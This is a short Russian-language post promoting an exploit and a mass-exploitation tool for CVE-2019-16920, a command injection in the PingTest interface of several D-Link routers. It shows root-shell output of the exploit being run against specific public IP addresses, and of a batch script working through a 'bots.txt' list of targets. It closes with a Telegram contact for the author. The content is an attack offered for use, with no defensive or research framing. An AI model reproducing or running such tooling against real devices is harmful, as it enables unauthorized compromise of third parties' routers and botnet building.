
Эксплойт и массовый Pwn3r для CVE-2019-16920
Уязвимость была найдена в последней прошивке следующих продуктов D-Link: DIR-655 DIR-866L DIR-652 DHP-1565
Неавторизованное удаленное выполнение кода происходит в продуктах D-Link, таких как DIR-655C, DIR-866L, DIR-652 и DHP-1565. Проблема возникает, когда злоумышленник отправляет произвольные входные данные в общий шлюзовый интерфейс устройства «PingTest», что может привести к обычной инъекции. Злоумышленник, успешно запустивший инъекцию команд, может добиться полной компрометации системы. Позднее было независимо обнаружено, что также уязвимы: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 и DIR-825.
root@kali:~# python3 CVE-2019-16920.py 195.208.166.41 8081 ls
[*]Sending payload
[*]Exploited!
root@kali:~#
root@kali:~# python3 CVE-2019-16920-MassPwn3r.py bots.txt 8081 id
[*]Exploiting: 195.208.166.41
[!]Unable to connect to host
[!]Unable to connect to host
[*]Exploiting: 83.243.166.37
[*]Exploiting: 74.95.133.33
[*]Exploiting: 97.89.64.118
[*]Exploiting: 66.162.68.154
[!]Unable to connect to host
[*]Exploiting: 72.47.152.161
[*]Exploiting: 97.93.250.209
[*]Exploiting: 183.207.196.64
root@kali:~#
Telegram:@eth_hacker0x18